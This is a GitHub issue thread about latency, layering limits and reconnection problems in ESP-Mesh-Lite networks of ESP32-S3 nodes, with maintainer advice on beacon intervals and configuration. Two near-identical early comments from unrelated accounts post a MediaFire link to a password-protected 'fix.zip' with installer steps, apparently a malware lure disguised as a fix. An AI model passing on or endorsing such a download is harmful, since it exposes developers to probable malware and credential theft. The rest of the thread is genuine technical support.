espressif/esp-mesh-lite #120: mesh lite node api request time out & long time

yel-best, 2024-08-26:
use Mesh-Lite v0.10.3
use ESP-IDF v5.2.2

I'm currently using a total of 5 nodes, all with default configurations and no modifications. Here's the logic of the test program I conducted:

Using the 5 nodes, each sends an HTTP request every second to an internal IP address. The API logic is straightforward, consisting of a GET request that consistently returns the same data structure, and the response time is very short.

However, the ESP32S3's performance, as shown in the diagram below, indicates the total time taken for each HTTP request in milliseconds.

You'll notice that the requests are relatively slow. When I access the same API with my computer, the request time is usually under 100 milliseconds. However, the ESP32S3 doesn't meet this requirement. There were no network topology changes among the nodes—there are only 5 nodes in total, all online, with one acting as the root node.

[image]

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

yel-best, 2024-08-28:
Update test results

If the http request is made by the ROOT node, it will be relatively fast, but if the level is lower, such as layer 4 and layer 5, the following results will appear, the delay is about 6000+(MS) or more, is it because of the problem of the forwarding test node jumping? Is there a solution?

I made a script in the application that requests an api every 2s and waits for the api request to succeed and then waits for 2s to make the next request

[image]

tswen, 2024-09-05:
How many devices have you deployed in total? Is the surrounding wireless environment subject to significant interference?

yel-best, 2024-09-06:
> How many devices have you deployed in total? Is the surrounding wireless environment subject to significant interference?

Close to 90 devices, using the WIFI scanning tool to detect WIFI quality is better

yel-best, 2024-09-11:
@tswen There are some questions about the configuration,hope you can answer, thank you

`CONFIG_MESH_LITE_MAX_ROUTER_NUMBER` Does it represent the number of children allowed?
`CONFIG_MESH_LITE_MAXIMUM_LEVEL_ALLOWED`Does it represent the number of levels allowed?
```
CONFIG_MESH_LITE_MAX_ROUTER_NUMBER=5
CONFIG_MESH_LITE_MAXIMUM_LEVEL_ALLOWED=10
```

tswen, 2024-09-11:
> > How many devices have you deployed in total? Is the surrounding wireless environment subject to significant interference?
> 
> Close to 90 devices, using the WIFI scanning tool to detect WIFI quality is better

If there are 90 devices, since all the devices are in the same channel, the interference between them is relatively large. It is recommended to increase the beacon interval appropriately.
```c
wifi_config_t wifi_cfg;
esp_wifi_get_config(WIFI_IF_AP, &wifi_cfg);
wifi_cfg.ap.beacon_interval = 400;
esp_wifi_set_config(WIFI_IF_AP, &wifi_cfg);
```

tswen, 2024-09-11:
> @tswen There are some questions about the configuration,hope you can answer, thank you
>
> `CONFIG_MESH_LITE_MAX_ROUTER_NUMBER` Does it represent the number of children allowed? [...]

CONFIG_MESH_LITE_MAX_ROUTER_NUMBER: is not used yet, so you don't need it.
CONFIG_MESH_LITE_MAXIMUM_LEVEL_ALLOWED: Yes, if set to 10, the network will reach a maximum of ten levels.

yel-best, 2025-03-10:
> CONFIG_MESH_LITE_MAX_ROUTER_NUMBER: is not used yet, so you don't need it. CONFIG_MESH_LITE_MAXIMUM_LEVEL_ALLOWED: Yes, if set to 10, the network will reach a maximum of ten levels.

The maximum number of layers allowed in the network: 1-15

The maximum number of downstream connections that each node can have: 1-10

Maximum number of downstream connections =3 , configuration parameter should I modify?

yel-best, 2025-04-14:
> Could you clarify whether the ​significant msg delay you mentioned occurs in:
> 
> ​1. Node-to-node communication via Mesh-Lite APIs, ​or 2. ​MQTT-based communication?
> 
> Additionally, would you try adjusting the ​beacon interval to 1000? This modification should notably improve performance in interference-prone environments.

Hi, Thank you for your answer.

node to node communication is not used,

All use mqtt to connect and send information, the traffic is about 1 piece of data per second, the data size is about 500b, I try to give `wifi_cfg.ap.beacon_interval = 400;` I will use your suggestions to adjust `wifi_cfg.ap.beacon_interval = 1000;`

However, the environment we use is relatively dense and there are not many routers, so the pressure is concentrated on mesh lite. I want to make the mesh lite very balanced except for 1~2~3 layer nodes. At present, we use 3 layers with 3 nodes per layer, and 300 ESP32s are used onsite

I will find that sometimes the device keeps remembering an upstream AP. I want to make the device forget the upstream AP every time it restarts and re-scan the connection. How should I do?

BR-Coding-cmd, 2025-04-14:
Hi @yel-best ,

We're trying to create something similar to your system configuration here, but are having an issue with the mesh stability as a whole even with <20 nodes in the mesh. Our expectation was to have a similar mesh size to that of yours or maybe cutting the 90 node mesh into smaller ones to reduce stress on the network.

Our configuration is as follows and we're using PCB antennae also;
`
 .vendor_id = {76, 77}, \
    .mesh_id = 10, \
    .max_connect_number = 10, \
    .max_router_number = 1, \
    .max_level = 3, \
    .max_node_number = 255, \
    .join_mesh_ignore_router_status = 1, \
    .join_mesh_without_configured_wifi = 1, \
    .leaf_node = 0, \
    .ota_data_len = 0, \
    .ota_wnd = 0, \
    .softap_ssid = Mesh_Bridge, \
    .softap_password = adminPassword, \
    .device_category = ESP32S3\
`

Would it be possible to share your `mesh_lite_config_t` in regards to how you've initialized the mesh_lite and if you're using external antennae via the U.FL (IPEX) connector? 

many thanks and I look forward to seeing the resolution of this issue/post
Best,
BR

tswen, 2025-04-15:
> Hi, Thank you for your answer.
>
> node to node communication is not used,
>
> All use mqtt to connect and send information, the traffic is about 1 piece of data per second, the data size is about 500b, I [...]

If 300 devices are deployed in a highly dense configuration, channel interference between devices will be significant—not just the root node, but all devices will be affected. We strongly advise against overly dense device placement.

If you want to prevent reconnection to a previously linked parent node after esp_restart, call esp_mesh_lite_erase_rtc_store before rebooting.

tswen, 2025-04-15:
> join_mesh_ignore_router_status

If you are not using the no_router scenario, we recommend setting join_mesh_ignore_router_status to 0. In root-node-connected-to-router cases, setting this parameter to 1 may negatively impact mesh formation.

tswen, 2025-04-15:
> Hi [@yel-best](https://github.com/yel-best) ,
>
> We're trying to create something similar to your system configuration here, but are having an issue with the mesh stability as a whole even with <20 [...]

If you are not using the no_router scenario, we recommend setting join_mesh_ignore_router_status to 0. In root-node-connected-to-router cases, setting this parameter to 1 may negatively impact mesh formation.

tswen, 2025-05-15:
> open up to 3 layers, with 5 nodes on each layer. Calculated this way, one mesh root node can support about 30 nodes.

This calculation is correct.  

If the issue is channel congestion, adjusting the maximum number of devices in the mesh topology will not improve performance. Only increasing the beacon interval and spacing between devices will help. However, based on your description, the device density seems acceptable.  

Reducing the maximum number of devices in the mesh topology (from 100 to 30) may lower communication latency because the root node will have less data forwarding pressure. Additionally, the mesh topology should then have fewer devices that are physically far apart or at high hierarchical levels.

yel-best, 2025-05-16:
> This calculation is correct.
>
> If the issue is channel congestion, adjusting the maximum number of devices in the mesh topology will not improve performance. Only increasing the beacon interval and [...]

Ok，

However, I have found that when we deploy such a large number of devices, after the ESP32 restarts, many such Task logs will be triggered, constantly scanning the WIFI and not connecting to the AP or STA, causing the devices to completely go offline and be unable to go online. What is the reason for this? Is it because there are too many? Or is it a problem with some Settings?

```
I (2528182) [ESP_Mesh_Lite_Comm]: approved: 1
I (2528182) app_bee: WI-FI Station Finished scanning AP
I (2528190) [vendor_ie]: esp_mesh_lite_wifi_scan_start return ESP_OK
I (2528690) [ESP_Mesh_Lite_Comm]: Mesh-Lite Comm Scan done
I (2528691) [ESP_Mesh_Lite_Comm]: approved: 1
I (2528691) app_bee: WI-FI Station Finished scanning AP
I (2529033) [vendor_ie]: esp_mesh_lite_wifi_scan_start return ESP_OK
I (2529533) [ESP_Mesh_Lite_Comm]: Mesh-Lite Comm Scan done
I (2529534) [ESP_Mesh_Lite_Comm]: approved: 1
I (2529534) app_bee: WI-FI Station Finished scanning AP
I (2529559) [vendor_ie]: esp_mesh_lite_wifi_scan_start return ESP_OK
I (2530059) [ESP_Mesh_Lite_Comm]: Mesh-Lite Comm Scan done
I (2530060) [ESP_Mesh_Lite_Comm]: approved: 1
I (2530060) app_bee: WI-FI Station Finished scanning AP
I (2530249) [vendor_ie]: esp_mesh_lite_wifi_scan_start return ESP_OK
I (2530750) [ESP_Mesh_Lite_Comm]: Mesh-Lite Comm Scan done
I (2530750) [ESP_Mesh_Lite_Comm]: approved: 1
I (2530751) app_bee: WI-FI Station Finished scanning AP
I (2530858) [vendor_ie]: esp_mesh_lite_wifi_scan_start return ESP_OK
I (2531358) [ESP_Mesh_Lite_Comm]: Mesh-Lite Comm Scan done
I (2531359) [ESP_Mesh_Lite_Comm]: approved: 1
I (2531360) app_bee: WI-FI Station Finished scanning AP
I (2531612) [vendor_ie]: esp_mesh_lite_wifi_scan_start return ESP_OK
```

tswen, 2025-05-19:
Where is the log message app_bee: WI-FI Station Finished scanning AP printed from? Does your application layer code call functions like esp_wifi_scan_start?

yel-best, 2025-05-19:
> Where is the log message app_bee: `WI-FI Station Finished scanning AP` printed from? Does your application layer code call functions like `esp_wifi_scan_start`?

static void app_scan_start(void)
{
    // Implementation of scan start callback
    ESP_LOGD(TAG, "mesh lite app_scan_start");
    return;
}

static void app_scan_end(void)
{
    // Implementation of scan end callback
    ESP_LOGD(TAG, "mesh lite app_scan_end");
    return;
}

static esp_mesh_lite_scan_cb_t mesh_lite_scan_cb = {
    .scan_start_cb = app_scan_start,
    .scan_end_cb = app_scan_end,
};

 esp_mesh_lite_scan_cb_register(&mesh_lite_scan_cb);

It was not called directly,`esp_wifi_scan_start`

I just registered such an event in the main function to facilitate my own viewing of some scanning action logs

will this be affected?

tswen, 2025-05-20:
Could you please call ​**esp_mesh_lite_core_log_enable(true)​ after ​esp_mesh_lite_init, then provide the ​complete log files**​ from power-on until the issue occurs for debugging?

yel-best, 2025-05-21:
> Could you please call ​**esp_mesh_lite_core_log_enable(true)​ after ​esp_mesh_lite_init, then provide the ​complete log files**​ from power-on until the issue occurs for debugging?

Ok, i will provide it later

In addition, I want to create two completely independent Meshes in the same area. For example, mesh_wifi_1 is for connecting the temperature sensor, and mesh_wifi_2 is for connecting the humidity sensor. I want to make a distinction. I don't know if it will improve the stability of the mesh network. How should I achieve it?

[image]

yel-best, 2025-05-21:
[log.txt](https://github.com/user-attachments/files/20362968/log.txt)

tswen, 2025-05-23:
> Ok, i will provide it later
>
> In addition, I want to create two completely independent Meshes in the same area. For example, mesh_wifi_1 is for connecting the temperature sensor, and mesh_wifi_2 is [...]

Different mesh networks can be distinguished by setting different mesh IDs.

tswen, 2025-05-23:
> [log.txt](https://github.com/user-attachments/files/20362968/log.txt)

Could you confirm which version you are using? You can check this by looking for the "[vendor_ie]: Mesh-Lite commit id: xxxxxx" message during the mesh-lite initialization at boot. Alternatively, you may update mesh-lite to the latest master branch version and verify if the issue persists.

yel-best, 2025-05-23:
> Could you confirm which version you are using? You can check this by looking for the "[vendor_ie]: Mesh-Lite commit id: xxxxxx" message during the mesh-lite initialization at boot. Alternatively, [...]

use mesh_lite v1.0.1

tswen, 2025-05-23:
> use mesh_lite v1.0.1

You can check this by looking for the "**[vendor_ie]: Mesh-Lite commit id: xxxxxx**".

I neet the commit id.